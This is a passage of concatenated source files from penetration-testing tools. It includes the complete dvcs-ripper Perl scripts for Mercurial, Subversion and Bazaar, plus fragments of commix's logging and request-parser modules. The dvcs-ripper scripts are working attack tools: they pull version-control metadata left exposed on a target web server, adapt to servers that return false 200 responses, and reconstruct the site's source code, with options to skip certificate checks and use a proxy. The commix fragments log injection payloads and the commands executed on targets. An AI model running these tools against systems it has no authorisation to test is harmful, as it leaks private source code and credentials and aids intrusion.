97 | if not os.path.exists(settings.CLI_HISTORY): 98 | open(settings.CLI_HISTORY,'a').close() 99 | 100 | if menu.options.session_file is not None: 101 | if os.path.exists(menu.options.session_file): 102 | settings.SESSION_FILE = menu.options.session_file 103 | else: 104 | err_msg = "The provided session file ('" + \ 105 | menu.options.session_file + \ 106 | "') does not exists." 107 | print settings.print_critical_msg(err_msg) 108 | sys.exit(0) 109 | else: 110 | settings.SESSION_FILE = output_dir + host + "/" + "session" + ".db" 111 | 112 | # Load command history 113 | load_cmd_history() 114 | 115 | # The logs filename construction. 116 | filename = output_dir + host + "/" + settings.OUTPUT_FILE 117 | output_file = open(filename, "a") 118 | output_file.write("\n" + "=" * 37) 119 | output_file.write("\n" + "| Started in " + \ 120 | datetime.datetime.fromtimestamp(time.time()).strftime('%m/%d/%Y' + \ 121 | " at " + '%H:%M:%S' + " |")) 122 | output_file.write("\n" + "=" * 37) 123 | output_file.write("\n" + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + "Tested URL : " + url) 124 | output_file.close() 125 | 126 | return filename 127 | 128 | """ 129 | Add the injection type / technique in log files. 130 | """ 131 | def add_type_and_technique(export_injection_info, filename, injection_type, technique): 132 | if export_injection_info == False: 133 | settings.SHOW_LOGS_MSG = True 134 | output_file = open(filename, "a") 135 | output_file.write("\n" + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + "Type: " + injection_type.title()) 136 | output_file.write("\n" + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + "Technique: " + technique.title()) 137 | output_file.close() 138 | export_injection_info = True 139 | 140 | return export_injection_info 141 | 142 | """ 143 | Add the vulnerable parameter in log files. 144 | """ 145 | def add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload): 146 | output_file = open(filename, "a") 147 | if header_name[1:] == "cookie": 148 | header_name = " ("+ header_name[1:] + ") " + vuln_parameter 149 | if header_name[1:] == "": 150 | header_name = " ("+ http_request_method + ") " + vuln_parameter 151 | output_file.write("\n" + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + the_type[1:].title() + ": " + header_name[1:]) 152 | vp_flag = False 153 | output_file.write("\n") 154 | output_file.close() 155 | 156 | """ 157 | Add any payload in log files. 158 | """ 159 | def update_payload(filename, counter, payload): 160 | output_file = open(filename, "a") 161 | if "\n" in payload: 162 | output_file.write(" (" +str(counter)+ ") Payload: " + re.sub("%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))) + "\n") 163 | else: 164 | output_file.write(" (" +str(counter)+ ") Payload: " + re.sub("%20", " ", payload) + "\n") 165 | output_file.close() 166 | 167 | """ 168 | Add any executed command and 169 | execution output result in log files. 170 | """ 171 | def executed_command(filename, cmd, output): 172 | try: 173 | output_file = open(filename, "a") 174 | output_file.write(re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + "Executed command: " + cmd + "\n") 175 | output_file.write(" " + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.INFO_SIGN) + "Execution output: " + output + "\n") 176 | output_file.close() 177 | except TypeError: 178 | pass 179 | 180 | """ 181 | Log files cration notification. 182 | """ 183 | def logs_notification(filename): 184 | # Save command history. 185 | info_msg = "The results can be found at '" + os.getcwd() + "/" + filename + "'" 186 | print settings.print_info_msg(info_msg) 187 | 188 | """ 189 | Log all HTTP traffic into a textual file. 190 | """ 191 | def log_traffic(header): 192 | output_file = open(menu.options.traffic_file, "a") 193 | output_file.write(header) 194 | output_file.close() 195 | 196 | """ 197 | Print logs notification. 198 | """ 199 | def print_logs_notification(filename, url): 200 | save_cmd_history() 201 | if settings.SHOW_LOGS_MSG == True: 202 | logs_notification(filename) 203 | if url: 204 | session_handler.clear(url) 205 | 206 | # eof -------------------------------------------------------------------------------- /dvcs-ripper/rip-hg.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use LWP::UserAgent; 8 | use HTTP::Request; 9 | use HTTP::Response; 10 | use Getopt::Long; 11 | 12 | use File::Path qw(make_path); 13 | use File::Basename; 14 | 15 | 16 | my $configfile="$ENV{HOME}/.rip-hg"; 17 | my %config; 18 | $config{'hgdir'} = ".hg"; 19 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 20 | $config{'verbose'}=0; 21 | $config{'checkout'}=1; 22 | 23 | $config{'respdetectmax'}=3; 24 | $config{'resp404size'}=256; 25 | $config{'resp404reqsize'}=32; 26 | 27 | sub randomstr { 28 | my($num) = @_; 29 | my @chars = ("A".."Z", "a".."z"); 30 | my $string; 31 | $string .= $chars[rand @chars] for 1..$num; 32 | return $string; 33 | } 34 | 35 | if (-e $configfile) { 36 | open(CONFIG,"<$configfile") or next; 37 | while () { 38 | chomp; # no newline 39 | s/#.*//; # no comments 40 | s/^\s+//; # no leading white 41 | s/\s+$//; # no trailing white 42 | next unless length; # anything left? 43 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 44 | $config{$var} = $value; 45 | } 46 | close(CONFIG); 47 | } 48 | 49 | Getopt::Long::Configure ("bundling"); 50 | 51 | my $result = GetOptions ( 52 | "a|agent=s" => \$config{'agent'}, 53 | "b|branch=s" => \$config{'branch'}, 54 | "u|url=s" => \$config{'url'}, 55 | "p|proxy=s" => \$config{'proxy'}, 56 | "c|checkout!" => \$config{'checkout'}, 57 | "s|sslignore!" => \$config{'sslignore'}, 58 | "v|verbose+" => \$config{'verbose'}, 59 | "h|help" => \&help 60 | ); 61 | 62 | my @knownfiles=( 63 | '00changelog.i', 64 | 'dirstate', 65 | 'requires', 66 | 'branch', 67 | 'branchheads.cache', 68 | 'last-message.txt', 69 | 'tags.cache', 70 | 'undo.branch', 71 | 'undo.desc', 72 | 'undo.dirstate', 73 | 'store/00changelog.i', 74 | 'store/00changelog.d', 75 | 'store/00manifest.i', 76 | 'store/00manifest.d', 77 | 'store/fncache', 78 | 'store/undo', 79 | '.hgignore' 80 | ); 81 | 82 | my $ua = LWP::UserAgent->new; 83 | 84 | $ua->agent($config{'agent'}); 85 | 86 | if ($config{'sslignore'}) { 87 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 88 | } 89 | if ($config{'proxy'}) { 90 | # for socks proxy make sure you have LWP::Protocol::socks 91 | $ua->proxy(['http', 'https'], $config{'proxy'}); 92 | } 93 | 94 | my $ddir=$config{'hgdir'}."/"; 95 | 96 | mkdir $ddir; 97 | mkdir $ddir."store"; 98 | mkdir $ddir."store/data"; 99 | 100 | print STDERR "[i] Downloading hg files from $config{'url'}\n" if ($config{'verbose'}>0); 101 | 102 | my @resp404; 103 | my $respdetectmax=$config{'respdetectmax'}; 104 | print STDERR "[i] Auto-detecting 404 as 200 with $config{'respdetectmax'} requests\n" if ($config{'verbose'}>0); 105 | $config{'resp404correct'}=0; 106 | for (my $i=0; $i<$respdetectmax;$i++) { 107 | my $resp=getreq(randomstr($config{'resp404reqsize'})); 108 | if ($resp->is_success) { 109 | push @resp404, $resp; 110 | } else { 111 | $config{'resp404correct'}=1; 112 | last; # exit loop 113 | } 114 | } 115 | 116 | if ($config{'resp404correct'}) { 117 | print STDERR "[i] Getting correct 404 responses\n"; 118 | } else { 119 | print STDERR "[i] Getting 200 as 404 responses. Adapting...\n"; 120 | my $oldchopresp = substr($resp404[0]->content,0,$config{'resp404size'}); 121 | foreach my $entry (@resp404) { 122 | my $chopresp=substr($entry->content,0,$config{'resp404size'}); 123 | if ($oldchopresp eq $chopresp) { 124 | $oldchopresp=substr($entry->content,0,$config{'resp404size'}); 125 | } else { 126 | print STDERR "[i] 404 responses are different, you will have to customize script source code\n"; 127 | $config{'resp404content'}=$chopresp; 128 | last; # exit loop 129 | } 130 | } 131 | $config{'resp404content'}=$oldchopresp; 132 | } 133 | 134 | foreach my $file (@knownfiles) { 135 | getfile($file,$ddir.$file); 136 | } 137 | 138 | print STDERR "[i] Running hg status to check for missing items\n" if ($config{'verbose'}>0); 139 | my @repfiles; 140 | open(PIPE,"hg status -A |") or die "cannot find hg: $!"; 141 | while () { 142 | chomp; 143 | my @getref = split (/\s+/); 144 | push @repfiles, $getref[1]; # 2nd field is filename 145 | } 146 | close(PIPE); 147 | print STDERR "[i] Got items with hg status: $#repfiles\n" if ($config{'verbose'}>0); 148 | 149 | 150 | my $numfiles=0; 151 | foreach my $file (@repfiles) { 152 | my($filename, $dirs, $suffix) = fileparse($file); 153 | my $rpath="store/data/".$file; 154 | make_path($ddir."store/data/".$dirs); 155 | my $res=getfile($rpath.".d",$ddir.$rpath.".d"); 156 | my $res=getfile($rpath.".i",$ddir.$rpath.".i"); 157 | if ($res->is_success) { 158 | if ($config{'checkout'}) { 159 | system("hg revert ".$file); 160 | } 161 | $numfiles++; 162 | 163 | } 164 | } 165 | 166 | my $maxfiles=$#repfiles+1; 167 | print STDERR "[i] Finished ($numfiles of $maxfiles)\n"; 168 | 169 | # -- END 170 | 171 | sub getreq { 172 | my ($file) = @_; 173 | my $furl = $config{'url'}."/".$file; 174 | my $req = HTTP::Request->new(GET => $furl); 175 | # Pass request to the user agent and get a response back 176 | my $res = $ua->request($req); 177 | return $res; 178 | } 179 | 180 | sub getfile { 181 | my ($file,$outfile) = @_; 182 | my $furl = $config{'url'}."/".$file; 183 | my $req = HTTP::Request->new(GET => $furl); 184 | # Pass request to the user agent and get a response back 185 | my $res = $ua->request($req); 186 | if ($res->is_success) { 187 | if (not $config{'resp404correct'}) { 188 | print STDERR "[d] got 200 for $file, but checking content\n" if ($config{'verbose'}>1);; 189 | my $chopresp=substr($res->content,0,$config{'resp404size'}); 190 | if ($chopresp eq $config{'resp404content'}) { 191 | print STDERR "[!] Not found for $file: 404 as 200\n" 192 | if ($config{'verbose'}>0); 193 | return $res; 194 | } 195 | } 196 | print STDERR "[d] found $file\n" if ($config{'verbose'}>0);; 197 | open (out,">$outfile") or die ("cannot open file $outfile: $!"); 198 | print out $res->content; 199 | close (out); 200 | } else { 201 | print STDERR "[!] Not found for $file: ".$res->status_line."\n" 202 | if ($config{'verbose'}>0); 203 | } 204 | return $res; 205 | } 206 | 207 | sub help { 208 | print "DVCS-Ripper: rip-hg.pl. Copyright (C) Kost. Distributed under GPL.\n\n"; 209 | print "Usage: $0 [options] -u [hgurl] \n"; 210 | print "\n"; 211 | print " -c perform 'hg revert' on end (default)\n"; 212 | print " -b Use branch (default: $config{'branch'})\n"; 213 | print " -a Use agent (default: $config{'agent'})\n"; 214 | print " -s do not verify SSL cert\n"; 215 | print " -p use proxy for connections\n"; 216 | print " -v verbose (-vv will be more verbose)\n"; 217 | print "\n"; 218 | print "Example: $0 -v -u http://www.example.com/.hg/\n"; 219 | print "Example: $0 # with url and options in $configfile\n"; 220 | print "Example: $0 -v -u -p socks://localhost:1080 http://www.example.com/.hg/\n"; 221 | print "For socks like proxy, make sure you have LWP::Protocol::socks\n"; 222 | 223 | exit 0; 224 | } 225 | 226 | -------------------------------------------------------------------------------- /dvcs-ripper/rip-svn.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use DBI; 8 | use LWP::UserAgent; 9 | use HTTP::Request; 10 | use Getopt::Long; 11 | 12 | my $configfile="$ENV{HOME}/.rip-svn"; 13 | my %config; 14 | $config{'branch'} = "trunk"; 15 | $config{'scmdir'} = ".svn"; 16 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 17 | $config{'verbose'}=0; 18 | $config{'checkout'}=1; 19 | $config{'outdir'}='./'; 20 | $config{'upgrade'}=1; 21 | 22 | if (-e $configfile) { 23 | open(CONFIG,"<$configfile") or next; 24 | while () { 25 | chomp; # no newline 26 | s/#.*//; # no comments 27 | s/^\s+//; # no leading white 28 | s/\s+$//; # no trailing white 29 | next unless length; # anything left? 30 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 31 | $config{$var} = $value; 32 | } 33 | close(CONFIG); 34 | } 35 | 36 | Getopt::Long::Configure ("bundling"); 37 | 38 | my $result = GetOptions ( 39 | "a|agent=s" => \$config{'agent'}, 40 | "b|branch=s" => \$config{'branch'}, 41 | "u|url=s" => \$config{'url'}, 42 | "c|checkout!" => \$config{'checkout'}, 43 | "s|sslignore!" => \$config{'sslignore'}, 44 | "v|verbose+" => \$config{'verbose'}, 45 | "h|help" => \&help 46 | ); 47 | 48 | my @scmfiles=( 49 | "all-wcprops", 50 | "entries", 51 | "format", 52 | "wc.db" 53 | ); 54 | 55 | if ($config{'verbose'}>3) { 56 | foreach my $key ( keys %config ) 57 | { 58 | print "$key => $config{$key}\n"; 59 | } 60 | } 61 | 62 | my @commits; 63 | my $ua = LWP::UserAgent->new; 64 | $ua->agent($config{'agent'}); 65 | 66 | if ($config{'sslignore'}) { 67 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 68 | } 69 | 70 | # normalize URL 71 | if ($config{'url'} =~ /\/\.svn/) { 72 | $config{'scmurl'} = $config{'url'}; 73 | $config{'regurl'} = $config{'url'}; 74 | $config{'regurl'} =~ s/\/\.svn//; 75 | } else { 76 | $config{'scmurl'} = $config{'url'}."/.svn"; 77 | $config{'regurl'} = $config{'url'}; 78 | } 79 | 80 | createsvndirs($config{'outdir'}); 81 | downloadsvnfiles('',$config{'outdir'}); 82 | 83 | if (-e "$config{'scmdir'}/wc.db") { 84 | print STDERR "[i] Found new SVN client storage format!\n"; 85 | my $dbh = DBI->connect("dbi:SQLite:dbname=.svn/wc.db","",""); 86 | 87 | my $sqlr = 'SELECT id,root,uuid FROM repository'; 88 | my $sth = $dbh->prepare($sqlr) or warn "Couldn't prepare statement '$sqlr': " . $dbh->errstr; 89 | $sth->execute(); 90 | while (my $record = $sth->fetchrow_hashref()) { 91 | print "REP INFO => $record->{'id'}:$record->{'root'}:$record->{'uuid'}\n"; 92 | } 93 | 94 | my $sqlp = "select checksum,compression,md5_checksum from pristine"; 95 | my $sthp = $dbh->prepare($sqlp) or warn "Couldn't prepare statement '$sqlp': " . $dbh->errstr; 96 | $sthp->execute(); 97 | while (my $record = $sthp->fetchrow_hashref()) { 98 | print "REC INFO => $record->{'checksum'}:$record->{'compression'}:$record->{'checksum_md5'}\n" if ($config{'verbose'}>1);; 99 | if ($record->{'checksum'} =~ /\$sha1\$/) { 100 | my $nfile=substr ($record->{'checksum'},6); 101 | getobject("$config{'outdir'}/$config{'scmdir'}",$nfile); 102 | } else { 103 | warn("Unknown checksum: $record->{'checksum'}"); 104 | } 105 | } 106 | $dbh->disconnect; 107 | checkout(); 108 | 109 | } else { 110 | if (-e "$config{'scmdir'}/entries") { 111 | print STDERR "[i] Found old SVN client storage format!\n"; 112 | svnentries('',$config{'outdir'}); 113 | if ($config{'checkout'} and $config{'upgrade'}) { 114 | print STDERR "[i] Running upgrade, if you get errors, ignore if using older client\n"; 115 | system("svn upgrade"); 116 | } 117 | checkout(); 118 | print STDERR "[i] Due to limitations, to get full tree - run this utility few times!\n"; 119 | } else { 120 | print STDERR "[i] Could not identify SVN format. Are you sure it's SVN there?\n"; 121 | print STDERR "[i] Anyway, take a look at ".$config{'scmurl'}."/"."entries\n"; 122 | } 123 | } 124 | 125 | sub checkout { 126 | if ($config{'checkout'}) { 127 | print STDERR "[i] Trying to revert the tree, if you get error, upgrade your SVN client!\n"; 128 | system("svn revert -R ."); 129 | } 130 | } 131 | 132 | sub createsvndirs { 133 | my ($dir) = @_; 134 | mkdir $dir."/.svn"; 135 | mkdir $dir."/.svn/text-base"; 136 | mkdir $dir."/.svn/pristine"; 137 | mkdir $dir."/.svn/tmp"; 138 | } 139 | 140 | sub downloadsvnfiles { 141 | my ($url,$dir) = @_; 142 | foreach my $file (@scmfiles) { 143 | my $furl = "$url/$config{'scmdir'}/$file"; 144 | getfile($furl,"$dir/$config{'scmdir'}/$file"); 145 | } 146 | } 147 | 148 | sub svnentries { 149 | my ($url, $dir) = @_; 150 | 151 | createsvndirs("$dir"); 152 | my $svnentries = "$dir/$config{'scmdir'}/entries"; 153 | # getfile("/$svnentries","$dir/$svnentries"); 154 | # my $file="$dir/$svnentries"; 155 | 156 | downloadsvnfiles($url,$dir); 157 | 158 | open(SVN,"<$svnentries") or warn ("cannot open entries file '$svnentries': $!\n"); 159 | my $prevline; 160 | while () { 161 | chomp; 162 | if ($_ eq "dir") { 163 | if (not $prevline eq '') { 164 | my $newdir=$prevline; 165 | if (not -e $newdir) { 166 | mkdir $newdir; 167 | svnentries("$url/$newdir","$dir/$newdir"); 168 | } 169 | } 170 | } 171 | 172 | if ($_ eq "file") { 173 | my $newfile=$prevline; 174 | getfile("$url/.svn/text-base/$newfile.svn-base","$dir/.svn/text-base/$newfile.svn-base"); 175 | } 176 | $prevline=$_; 177 | } 178 | close(SVN); 179 | } 180 | 181 | 182 | sub getobject { 183 | my ($gd,$ref) = @_; 184 | my $rdir = substr ($ref,0,2); # first two chars of sha1 is dirname 185 | my $rfile = $ref.".svn-base"; # whole sha1 is filename 186 | mkdir $gd."/pristine/$rdir"; 187 | getfile($config{'scmdir'}."/pristine/$rdir/$rfile",$gd."/pristine/$rdir/$rfile"); 188 | } 189 | 190 | sub getfile { 191 | my ($file,$outfile) = @_; 192 | my $furl = $config{'regurl'}."/".$file; 193 | my $req = HTTP::Request->new(GET => $furl); 194 | # Pass request to the user agent and get a response back 195 | my $res = $ua->request($req); 196 | if ($res->is_success) { 197 | print STDERR "[d] found $file\n" if ($config{'verbose'}>1);; 198 | open (out,">$outfile") or die ("cannot open file '$outfile': $!"); 199 | print out $res->content; 200 | close (out); 201 | } else { 202 | print STDERR "[!] Not found for $furl => $file: ".$res->status_line."\n" 203 | if ($config{'verbose'}>1); 204 | } 205 | return $res; 206 | } 207 | 208 | sub help { 209 | print "DVCS-Ripper: rip-svn.pl. Copyright (C) Kost. Distributed under GPL.\n\n"; 210 | print "Usage: $0 [options] -u [svnurl] \n"; 211 | print "\n"; 212 | print " -c perform 'checkout' on end (default)\n"; 213 | print " -b Use branch (default: $config{'branch'})\n"; 214 | print " -a Use agent (default: $config{'agent'})\n"; 215 | print " -s ignore SSL certification verification\n"; 216 | print " -v verbose (-vv will be more verbose)\n"; 217 | print "\n"; 218 | 219 | print "Example: $0 -v -u http://www.example.com/.svn/\n"; 220 | print "Example: $0 # with url and options in $configfile\n"; 221 | 222 | exit 0; 223 | } 224 | 225 | -------------------------------------------------------------------------------- /dvcs-ripper/rip-bzr.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use LWP::UserAgent; 8 | use HTTP::Request; 9 | use HTTP::Response; 10 | use Getopt::Long; 11 | use Cwd; 12 | 13 | my $configfile="$ENV{HOME}/.rip-bzr"; 14 | my %config; 15 | $config{'bzrdir'} = ".bzr"; 16 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 17 | $config{'verbose'}=0; 18 | $config{'checkout'}=1; 19 | 20 | $config{'respdetectmax'}=3; 21 | $config{'resp404size'}=256; 22 | $config{'resp404reqsize'}=32; 23 | 24 | sub randomstr { 25 | my($num) = @_; 26 | my @chars = ("A".."Z", "a".."z"); 27 | my $string; 28 | $string .= $chars[rand @chars] for 1..$num; 29 | return $string; 30 | } 31 | 32 | if (-e $configfile) { 33 | open(CONFIG,"<$configfile") or next; 34 | while () { 35 | chomp; # no newline 36 | s/#.*//; # no comments 37 | s/^\s+//; # no leading white 38 | s/\s+$//; # no trailing white 39 | next unless length; # anything left? 40 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 41 | $config{$var} = $value; 42 | } 43 | close(CONFIG); 44 | } 45 | 46 | Getopt::Long::Configure ("bundling"); 47 | 48 | my $result = GetOptions ( 49 | "a|agent=s" => \$config{'agent'}, 50 | "b|branch=s" => \$config{'branch'}, 51 | "u|url=s" => \$config{'url'}, 52 | "p|proxy=s" => \$config{'proxy'}, 53 | "c|checkout!" => \$config{'checkout'}, 54 | "s|sslignore!" => \$config{'sslignore'}, 55 | "v|verbose+" => \$config{'verbose'}, 56 | "h|help" => \&help 57 | ); 58 | 59 | my @knownfiles=( 60 | 'branch-format', 61 | 'branch/branch.conf', 62 | 'branch/format', 63 | 'branch/last-revision', 64 | 'branch/tags', 65 | 'checkout/conflicts', 66 | 'checkout/dirstate', 67 | 'checkout/format', 68 | 'checkout/merge-hashes', 69 | 'checkout/views', 70 | 'repository/format', 71 | 'repository/pack-names' 72 | ); 73 | 74 | my $ua = LWP::UserAgent->new; 75 | 76 | $ua->agent($config{'agent'}); 77 | 78 | if ($config{'sslignore'}) { 79 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 80 | } 81 | if ($config{'proxy'}) { 82 | # for socks proxy make sure you have LWP::Protocol::socks 83 | $ua->proxy(['http', 'https'], $config{'proxy'}); 84 | } 85 | 86 | my $ddir=$config{'bzrdir'}."/"; 87 | 88 | mkdir $ddir; 89 | mkdir $ddir."branch"; 90 | mkdir $ddir."checkout"; 91 | mkdir $ddir."repository"; 92 | mkdir $ddir."repository/indices"; 93 | mkdir $ddir."repository/packs"; 94 | 95 | print STDERR "[i] Downloading bzr files from $config{'url'}\n" if ($config{'verbose'}>0); 96 | 97 | my @resp404; 98 | my $respdetectmax=$config{'respdetectmax'}; 99 | print STDERR "[i] Auto-detecting 404 as 200 with $config{'respdetectmax'} requests\n" if ($config{'verbose'}>0); 100 | $config{'resp404correct'}=0; 101 | for (my $i=0; $i<$respdetectmax;$i++) { 102 | my $resp=getreq(randomstr($config{'resp404reqsize'})); 103 | if ($resp->is_success) { 104 | push @resp404, $resp; 105 | } else { 106 | $config{'resp404correct'}=1; 107 | last; # exit loop 108 | } 109 | } 110 | 111 | if ($config{'resp404correct'}) { 112 | print STDERR "[i] Getting correct 404 responses\n"; 113 | } else { 114 | print STDERR "[i] Getting 200 as 404 responses. Adapting...\n"; 115 | my $oldchopresp = substr($resp404[0]->content,0,$config{'resp404size'}); 116 | foreach my $entry (@resp404) { 117 | my $chopresp=substr($entry->content,0,$config{'resp404size'}); 118 | if ($oldchopresp eq $chopresp) { 119 | $oldchopresp=substr($entry->content,0,$config{'resp404size'}); 120 | } else { 121 | print STDERR "[i] 404 responses are different, you will have to customize script source code\n"; 122 | $config{'resp404content'}=$chopresp; 123 | last; # exit loop 124 | } 125 | } 126 | $config{'resp404content'}=$oldchopresp; 127 | } 128 | 129 | foreach my $file (@knownfiles) { 130 | getfile($file,$ddir.$file); 131 | } 132 | 133 | 134 | my $tofetch=0; 135 | my $fetched=0; 136 | my $pcount=1; 137 | my $fcount=0; 138 | while ($pcount>0) { 139 | print STDERR "[i] Running bzr check to check for missing items\n" if ($config{'verbose'}>0); 140 | open(PIPE,"bzr check 2>&1 |") or die "cannot find bzr: $!"; 141 | $pcount=0; 142 | $fcount=0; 143 | while () { 144 | print $_ if ($config{'verbose'}>9); 145 | chomp; 146 | if (/ERROR:/) { 147 | $tofetch++; 148 | m/'(.*?)'/; 149 | my $missingfile = $1; 150 | my $curdir = getcwd."/".$config{'bzrdir'}."/"; 151 | substr $missingfile, index($missingfile, $curdir), length $curdir, ''; 152 | print STDERR "[i] Getting $missingfile\n" if ($config{'verbose'}>0); 153 | my $res=getfile($missingfile,$ddir.$missingfile); 154 | if ($res->is_success) { 155 | $fcount++; 156 | $fetched++; 157 | } 158 | $pcount++; 159 | } 160 | } 161 | close(PIPE); 162 | print STDERR "[i] Got items with bzr check: $pcount\n" if ($config{'verbose'}>0); 163 | print STDERR "[i] Items fetched: $fcount\n" if ($config{'verbose'}>0); 164 | if ($fcount == 0) { 165 | last; 166 | } 167 | } 168 | 169 | print STDERR "[i] Finished fetching ($fetched/$tofetch)\n"; 170 | 171 | if ($config{'checkout'}) { 172 | print STDERR "[i] Checking out/Reverting source by calling bzr revert\n"; 173 | system("bzr revert"); 174 | } 175 | 176 | # -- END 177 | 178 | sub getreq { 179 | my ($file) = @_; 180 | my $furl = $config{'url'}."/".$file; 181 | my $req = HTTP::Request->new(GET => $furl); 182 | # Pass request to the user agent and get a response back 183 | my $res = $ua->request($req); 184 | return $res; 185 | } 186 | 187 | sub getfile { 188 | my ($file,$outfile) = @_; 189 | my $furl = $config{'url'}."/".$file; 190 | my $req = HTTP::Request->new(GET => $furl); 191 | # Pass request to the user agent and get a response back 192 | my $res = $ua->request($req); 193 | if ($res->is_success) { 194 | if (not $config{'resp404correct'}) { 195 | print STDERR "[d] got 200 for $file, but checking content\n" if ($config{'verbose'}>1);; 196 | my $chopresp=substr($res->content,0,$config{'resp404size'}); 197 | if ($chopresp eq $config{'resp404content'}) { 198 | print STDERR "[!] Not found for $file: 404 as 200\n" 199 | if ($config{'verbose'}>0); 200 | return $res; 201 | } 202 | } 203 | print STDERR "[d] found $file\n" if ($config{'verbose'}>0);; 204 | open (out,">$outfile") or die ("cannot open file $outfile: $!"); 205 | print out $res->content; 206 | close (out); 207 | } else { 208 | print STDERR "[!] Not found for $file: ".$res->status_line."\n" 209 | if ($config{'verbose'}>0); 210 | } 211 | return $res; 212 | } 213 | 214 | sub help { 215 | print "DVCS-Ripper: rip-bzr.pl. Copyright (C) Kost. Distributed under GPL.\n\n"; 216 | print "Usage: $0 [options] -u [bzrurl] \n"; 217 | print "\n"; 218 | print " -c perform 'bzr revert' on end (default)\n"; 219 | print " -b Use branch (default: $config{'branch'})\n"; 220 | print " -a Use agent (default: $config{'agent'})\n"; 221 | print " -s do not verify SSL cert\n"; 222 | print " -p use proxy for connections\n"; 223 | print " -v verbose (-vv will be more verbose)\n"; 224 | print "\n"; 225 | print "Example: $0 -v -u http://www.example.com/.bzr/\n"; 226 | print "Example: $0 # with url and options in $configfile\n"; 227 | print "Example: $0 -v -u -p socks://localhost:1080 http://www.example.com/.bzr/\n"; 228 | print "For socks like proxy, make sure you have LWP::Protocol::socks\n"; 229 | 230 | exit 0; 231 | } 232 | 233 | -------------------------------------------------------------------------------- /commix/src/core/injections/controller/parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import os 17 | import re 18 | import sys 19 | import time 20 | import base64 21 | import urllib 22 | import datetime 23 | 24 | from src.utils import menu 25 | from src.utils import settings 26 | 27 | from src.thirdparty.colorama import Fore, Back, Style, init 28 | 29 | """ 30 | Parse target and data from http proxy logs (i.e Burp or WebScarab) 31 | """ 32 | def logfile_parser(): 33 | """ 34 | Warning message for mutiple request in same log file. 35 | """ 36 | def multi_requests(): 37 | print "[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]" 38 | warn_msg = "Multiple" 39 | if menu.options.requestfile: 40 | warn_msg += " requests" 41 | elif menu.options.logfile: 42 | warn_msg += " targets" 43 | warn_msg += " are not supported, thus all coming" 44 | if menu.options.requestfile: 45 | warn_msg += " requests " 46 | elif menu.options.logfile: 47 | warn_msg += " targets " 48 | warn_msg += "will be ignored." 49 | sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n") 50 | sys.stdout.flush() 51 | return False 52 | 53 | """ 54 | Error message for invalid data. 55 | """ 56 | def invalid_data(request, single_request): 57 | if single_request: 58 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 59 | err_msg = "Something seems to be wrong with " 60 | err_msg += "the '" + os.path.split(request_file)[1] + "' file. " 61 | sys.stdout.write(settings.print_critical_msg(err_msg) + "\n") 62 | sys.stdout.flush() 63 | sys.exit(0) 64 | 65 | if menu.options.requestfile: 66 | request_file = menu.options.requestfile 67 | info_msg = "Parsing HTTP request " 68 | 69 | elif menu.options.logfile: 70 | request_file = menu.options.logfile 71 | info_msg = "Parsing target " 72 | 73 | info_msg += "using the '" + os.path.split(request_file)[1] + "' file... " 74 | sys.stdout.write(settings.print_info_msg(info_msg)) 75 | sys.stdout.flush() 76 | 77 | if not os.path.exists(request_file): 78 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 79 | err_msg = "It seems that the '" + request_file + "' file, does not exists." 80 | sys.stdout.write(settings.print_critical_msg(err_msg) + "\n") 81 | sys.stdout.flush() 82 | sys.exit(0) 83 | 84 | else: 85 | # Check for multiple hosts 86 | request = open(request_file, "r") 87 | words_dict = {} 88 | for word in request.read().strip().splitlines(): 89 | if word[:4].strip() == "GET" or word[:4].strip() == "POST": 90 | words_dict[word[:4].strip()] = words_dict.get(word[:4].strip(), 0) + 1 91 | 92 | # Check if same header appears more than once. 93 | single_request = True 94 | if len(words_dict.keys()) > 1: 95 | single_request = multi_requests() 96 | for key in words_dict.keys(): 97 | if words_dict[key] > 1: 98 | single_request = multi_requests() 99 | 100 | # Check for GET / POST HTTP Header 101 | for http_header in ["GET","POST"]: 102 | request = open(request_file, "r") 103 | request = request.read() 104 | if "\\n" 